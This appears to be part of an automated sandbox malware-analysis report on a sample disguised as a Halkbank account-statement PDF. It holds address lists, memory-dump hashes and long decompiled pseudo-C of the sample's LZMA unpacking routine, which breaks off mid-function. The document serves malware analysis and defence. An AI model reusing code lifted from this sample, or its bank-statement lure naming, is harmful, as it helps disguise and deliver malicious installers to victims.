                                                                    0x0040724a
                                                                    0x0040724a
                                                                    0x0040724d
                                                                    0x0040724d
                                                                    0x00407250
                                                                    0x00407257
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407259
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407257
                                                                    0x004071dd
                                                                    0x004071dd
                                                                    0x004071e0
                                                                    0x004071e2
                                                                    0x004071e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f44
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x0040758d
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x0040758d
                                                                    0x00406f4e
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f5a
                                                                    0x00406f5d
                                                                    0x00406f60
                                                                    0x00406f62
                                                                    0x00406f65
                                                                    0x00406f68
                                                                    0x00406f6b
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070cf
                                                                    0x004070cf
                                                                    0x004070d3
                                                                    0x00407599
                                                                    0x00407599
                                                                    0x00000000
                                                                    0x00407599
                                                                    0x004070d9
                                                                    0x004070d9
                                                                    0x004070dc
                                                                    0x004070df
                                                                    0x004070e2
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e7
                                                                    0x004070ea
                                                                    0x004070ed
                                                                    0x004070f0
                                                                    0x004070f3
                                                                    0x004070f6
                                                                    0x004070f7
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407102
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407108
                                                                    0x0040710a
                                                                    0x0040710a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x00407350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407356
                                                                    0x00407356
                                                                    0x00407359
                                                                    0x0040735c
                                                                    0x0040735f
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407364
                                                                    0x00407367
                                                                    0x0040736a
                                                                    0x0040736d
                                                                    0x00407370
                                                                    0x00407373
                                                                    0x00407374
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407379
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407385
                                                                    0x00407389
                                                                    0x0040738b
                                                                    0x0040738e
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x00407390
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x00000000
                                                                    0x0040710d
                                                                    0x0040738e
                                                                    0x004075c3
                                                                    0x004075c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x004075fa
                                                                    0x004075fa
                                                                    0x00000000
                                                                    0x004075fa
                                                                    0x00407447
                                                                    0x004074c7
                                                                    0x00407490

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                    • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                    • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                    • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E00407395() {
                                                                    				void _t533;
                                                                    				signed int _t534;
                                                                    				signed int _t535;
                                                                    				signed int* _t605;
                                                                    				void* _t612;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					if( *(_t612 - 0x40) != 0) {
                                                                    						 *(_t612 - 0x84) = 0x13;
                                                                    						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                    						goto L132;
                                                                    					} else {
                                                                    						__eax =  *(__ebp - 0x4c);
                                                                    						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                    						__ecx =  *(__ebp - 0x58);
                                                                    						__eax =  *(__ebp - 0x4c) << 4;
                                                                    						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                    						L130:
                                                                    						 *(__ebp - 0x58) = __eax;
                                                                    						 *(__ebp - 0x40) = 3;
                                                                    						L144:
                                                                    						 *(__ebp - 0x7c) = 0x14;
                                                                    						L145:
                                                                    						__eax =  *(__ebp - 0x40);
                                                                    						 *(__ebp - 0x50) = 1;
                                                                    						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                    						L149:
                                                                    						if( *(__ebp - 0x48) <= 0) {
                                                                    							__ecx =  *(__ebp - 0x40);
                                                                    							__ebx =  *(__ebp - 0x50);
                                                                    							0 = 1;
                                                                    							__eax = 1 << __cl;
                                                                    							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                    							__eax =  *(__ebp - 0x7c);
                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                    							while(1) {
                                                                    								L140:
                                                                    								 *(_t612 - 0x88) = _t533;
                                                                    								while(1) {
                                                                    									L1:
                                                                    									_t534 =  *(_t612 - 0x88);
                                                                    									if(_t534 > 0x1c) {
                                                                    										break;
                                                                    									}
                                                                    									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                    										case 0:
                                                                    											if( *(_t612 - 0x6c) == 0) {
                                                                    												goto L170;
                                                                    											}
                                                                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                    											_t534 =  *( *(_t612 - 0x70));
                                                                    											if(_t534 > 0xe1) {
                                                                    												goto L171;
                                                                    											}
                                                                    											_t538 = _t534 & 0x000000ff;
                                                                    											_push(0x2d);
                                                                    											asm("cdq");
                                                                    											_pop(_t569);
                                                                    											_push(9);
                                                                    											_pop(_t570);
                                                                    											_t608 = _t538 / _t569;
                                                                    											_t540 = _t538 % _t569 & 0x000000ff;
                                                                    											asm("cdq");
                                                                    											_t603 = _t540 % _t570 & 0x000000ff;
                                                                    											 *(_t612 - 0x3c) = _t603;
                                                                    											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                    											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                    											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                    											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                    												L10:
                                                                    												if(_t611 == 0) {
                                                                    													L12:
                                                                    													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                    													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                    													goto L15;
                                                                    												} else {
                                                                    													goto L11;
                                                                    												}
                                                                    												do {
                                                                    													L11:
                                                                    													_t611 = _t611 - 1;
                                                                    													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                    												} while (_t611 != 0);
                                                                    												goto L12;
                                                                    											}
                                                                    											if( *(_t612 - 4) != 0) {
                                                                    												GlobalFree( *(_t612 - 4));
                                                                    											}
                                                                    											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                    											 *(_t612 - 4) = _t534;
                                                                    											if(_t534 == 0) {
                                                                    												goto L171;
                                                                    											} else {
                                                                    												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                    												goto L10;
                                                                    											}
                                                                    										case 1:
                                                                    											L13:
                                                                    											__eflags =  *(_t612 - 0x6c);
                                                                    											if( *(_t612 - 0x6c) == 0) {
                                                                    												 *(_t612 - 0x88) = 1;
                                                                    												goto L170;
                                                                    											}
                                                                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                    											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                    											_t45 = _t612 - 0x48;
                                                                    											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                    											__eflags =  *_t45;
                                                                    											L15:
                                                                    											if( *(_t612 - 0x48) < 4) {
                                                                    												goto L13;
                                                                    											}
                                                                    											_t546 =  *(_t612 - 0x40);
                                                                    											if(_t546 ==  *(_t612 - 0x74)) {
                                                                    												L20:
                                                                    												 *(_t612 - 0x48) = 5;
                                                                    												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                    												goto L23;
                                                                    											}
                                                                    											 *(_t612 - 0x74) = _t546;
                                                                    											if( *(_t612 - 8) != 0) {
                                                                    												GlobalFree( *(_t612 - 8));
                                                                    											}
                                                                    											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                    											 *(_t612 - 8) = _t534;
                                                                    											if(_t534 == 0) {
                                                                    												goto L171;
                                                                    											} else {
                                                                    												goto L20;
                                                                    											}
                                                                    										case 2:
                                                                    											L24:
                                                                    											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                    											 *(_t612 - 0x84) = 6;
                                                                    											 *(_t612 - 0x4c) = _t553;
                                                                    											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                    											goto L132;
                                                                    										case 3:
                                                                    											L21:
                                                                    											__eflags =  *(_t612 - 0x6c);
                                                                    											if( *(_t612 - 0x6c) == 0) {
                                                                    												 *(_t612 - 0x88) = 3;
                                                                    												goto L170;
                                                                    											}
                                                                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                    											_t67 = _t612 - 0x70;
                                                                    											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                    											__eflags =  *_t67;
                                                                    											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                    											L23:
                                                                    											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                    											if( *(_t612 - 0x48) != 0) {
                                                                    												goto L21;
                                                                    											}
                                                                    											goto L24;
                                                                    										case 4:
                                                                    											L133:
                                                                    											_t531 =  *_t605;
                                                                    											_t588 = _t531 & 0x0000ffff;
                                                                    											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                    											if( *(_t612 - 0xc) >= _t564) {
                                                                    												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                    												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                    												 *(_t612 - 0x40) = 1;
                                                                    												_t532 = _t531 - (_t531 >> 5);
                                                                    												__eflags = _t532;
                                                                    												 *_t605 = _t532;
                                                                    											} else {
                                                                    												 *(_t612 - 0x10) = _t564;
                                                                    												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                    												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                    											}
                                                                    											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                    												goto L139;
                                                                    											} else {
                                                                    												goto L137;
                                                                    											}
                                                                    										case 5:
                                                                    											L137:
                                                                    											if( *(_t612 - 0x6c) == 0) {
                                                                    												 *(_t612 - 0x88) = 5;
                                                                    												goto L170;
                                                                    											}
                                                                    											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                    											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                    											L139:
                                                                    											_t533 =  *(_t612 - 0x84);
                                                                    											goto L140;
                                                                    										case 6:
                                                                    											__edx = 0;
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x34) = 1;
                                                                    												 *(__ebp - 0x84) = 7;
                                                                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                    												goto L132;
                                                                    											}
                                                                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                    											__esi =  *(__ebp - 0x60);
                                                                    											__cl = 8;
                                                                    											__cl = 8 -  *(__ebp - 0x3c);
                                                                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                    											__ecx =  *(__ebp - 0x3c);
                                                                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                    											__ecx =  *(__ebp - 4);
                                                                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                    											__eflags =  *(__ebp - 0x38) - 4;
                                                                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    											if( *(__ebp - 0x38) >= 4) {
                                                                    												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                    												if( *(__ebp - 0x38) >= 0xa) {
                                                                    													_t98 = __ebp - 0x38;
                                                                    													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                    													__eflags =  *_t98;
                                                                    												} else {
                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                    												}
                                                                    											} else {
                                                                    												 *(__ebp - 0x38) = 0;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x34) - __edx;
                                                                    											if( *(__ebp - 0x34) == __edx) {
                                                                    												__ebx = 0;
                                                                    												__ebx = 1;
                                                                    												goto L61;
                                                                    											} else {
                                                                    												__eax =  *(__ebp - 0x14);
                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                    													__eflags = __eax;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 8);
                                                                    												__ebx = 0;
                                                                    												__ebx = 1;
                                                                    												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                    												goto L41;
                                                                    											}
                                                                    										case 7:
                                                                    											__eflags =  *(__ebp - 0x40) - 1;
                                                                    											if( *(__ebp - 0x40) != 1) {
                                                                    												__eax =  *(__ebp - 0x24);
                                                                    												 *(__ebp - 0x80) = 0x16;
                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    												__eax =  *(__ebp - 0x28);
                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    												__eax =  *(__ebp - 0x2c);
                                                                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    												__eax = 0;
                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    												__al = __al & 0x000000fd;
                                                                    												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__eax =  *(__ebp - 4) + 0x664;
                                                                    												__eflags = __eax;
                                                                    												 *(__ebp - 0x58) = __eax;
                                                                    												goto L69;
                                                                    											}
                                                                    											__eax =  *(__ebp - 4);
                                                                    											__ecx =  *(__ebp - 0x38);
                                                                    											 *(__ebp - 0x84) = 8;
                                                                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                    											goto L132;
                                                                    										case 8:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x84) = 0xa;
                                                                    												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                    											} else {
                                                                    												__eax =  *(__ebp - 0x38);
                                                                    												__ecx =  *(__ebp - 4);
                                                                    												__eax =  *(__ebp - 0x38) + 0xf;
                                                                    												 *(__ebp - 0x84) = 9;
                                                                    												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                    												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                    											}
                                                                    											goto L132;
                                                                    										case 9:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												goto L90;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x60);
                                                                    											if( *(__ebp - 0x60) == 0) {
                                                                    												goto L171;
                                                                    											}
                                                                    											__eax = 0;
                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                    											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                    											__eflags = _t259;
                                                                    											0 | _t259 = _t259 + _t259 + 9;
                                                                    											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                    											goto L76;
                                                                    										case 0xa:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x84) = 0xb;
                                                                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                    												goto L132;
                                                                    											}
                                                                    											__eax =  *(__ebp - 0x28);
                                                                    											goto L89;
                                                                    										case 0xb:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__ecx =  *(__ebp - 0x24);
                                                                    												__eax =  *(__ebp - 0x20);
                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    											} else {
                                                                    												__eax =  *(__ebp - 0x24);
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x28);
                                                                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    											L89:
                                                                    											__ecx =  *(__ebp - 0x2c);
                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    											L90:
                                                                    											__eax =  *(__ebp - 4);
                                                                    											 *(__ebp - 0x80) = 0x15;
                                                                    											__eax =  *(__ebp - 4) + 0xa68;
                                                                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                    											goto L69;
                                                                    										case 0xc:
                                                                    											L100:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xc;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t335 = __ebp - 0x70;
                                                                    											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t335;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											__eax =  *(__ebp - 0x2c);
                                                                    											goto L102;
                                                                    										case 0xd:
                                                                    											L37:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xd;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t122 = __ebp - 0x70;
                                                                    											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t122;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											L39:
                                                                    											__eax =  *(__ebp - 0x40);
                                                                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                    												goto L48;
                                                                    											}
                                                                    											__eflags = __ebx - 0x100;
                                                                    											if(__ebx >= 0x100) {
                                                                    												goto L54;
                                                                    											}
                                                                    											L41:
                                                                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                    											__ecx =  *(__ebp - 0x58);
                                                                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                    											 *(__ebp - 0x48) = __eax;
                                                                    											__eax = __eax + 1;
                                                                    											__eax = __eax << 8;
                                                                    											__eax = __eax + __ebx;
                                                                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    											__ax =  *__esi;
                                                                    											 *(__ebp - 0x54) = __esi;
                                                                    											__edx = __ax & 0x0000ffff;
                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    												__cx = __ax;
                                                                    												 *(__ebp - 0x40) = 1;
                                                                    												__cx = __ax >> 5;
                                                                    												__eflags = __eax;
                                                                    												__ebx = __ebx + __ebx + 1;
                                                                    												 *__esi = __ax;
                                                                    											} else {
                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                    												0x800 = 0x800 - __edx;
                                                                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                    												__ebx = __ebx + __ebx;
                                                                    												 *__esi = __cx;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    												goto L39;
                                                                    											} else {
                                                                    												goto L37;
                                                                    											}
                                                                    										case 0xe:
                                                                    											L46:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xe;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t156 = __ebp - 0x70;
                                                                    											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t156;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											while(1) {
                                                                    												L48:
                                                                    												__eflags = __ebx - 0x100;
                                                                    												if(__ebx >= 0x100) {
                                                                    													break;
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x58);
                                                                    												__edx = __ebx + __ebx;
                                                                    												__ecx =  *(__ebp - 0x10);
                                                                    												__esi = __edx + __eax;
                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    												__ax =  *__esi;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__edi = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													_t170 = __edx + 1; // 0x1
                                                                    													__ebx = _t170;
                                                                    													__cx = __ax >> 5;
                                                                    													__eflags = __eax;
                                                                    													 *__esi = __ax;
                                                                    												} else {
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edi;
                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    													__ebx = __ebx + __ebx;
                                                                    													 *__esi = __cx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													continue;
                                                                    												} else {
                                                                    													goto L46;
                                                                    												}
                                                                    											}
                                                                    											L54:
                                                                    											_t173 = __ebp - 0x34;
                                                                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                    											__eflags =  *_t173;
                                                                    											goto L55;
                                                                    										case 0xf:
                                                                    											L58:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xf;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t203 = __ebp - 0x70;
                                                                    											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t203;
